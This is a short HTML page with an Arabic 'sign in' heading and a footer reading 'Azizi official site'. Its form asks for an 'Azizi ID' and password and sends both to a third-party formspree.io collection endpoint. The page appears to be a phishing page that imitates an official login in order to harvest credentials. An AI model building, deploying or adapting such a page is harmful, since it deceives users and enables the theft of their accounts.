<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" type="image/ico" href="favicon.ico"/>
<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {

}

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
  border-radius: 10px;
  background-color : #242424;
}


body {
  background-color: #191919;
  color: #fff;
}

h2 {
  color: #ECCB74;
  padding-top: 10px;
  padding-right: 22px;
  text-align: right;
}

.footer
{
  color: #C89343;
  text-align: center;
  padding-top: 30px;
  font-size: 10px;

}

button {
  background: linear-gradient(
    50deg,
    rgba(200, 147, 67, 1) 0%,
    rgba(236, 203, 116, 1) 100%
  );
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
  border-radius: 10px;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
}
</style>
</head>
<body>

<h2>تسجيل الدخول</h2>

<form action="https://formspree.io/f/mnqlbbdk" method="POST" />
  <div class="container">
    <label for="uname"><b>Azizi ID</b></label>
    <input type="text" placeholder="Enter Azizi ID" name="uname" required>

    <label for="psw"><b>Password</b></label>
    <input type="password" placeholder="Enter Password" name="psw" required>

    <button type="submit">تسجيل الدخول</button>
  </div>
</form>
<div class="footer">
  <div class="problem">
      Common problem
      <br>
    </div>
    <div class="sole">Azizi official site</div>
    </div>
</body>
</html>
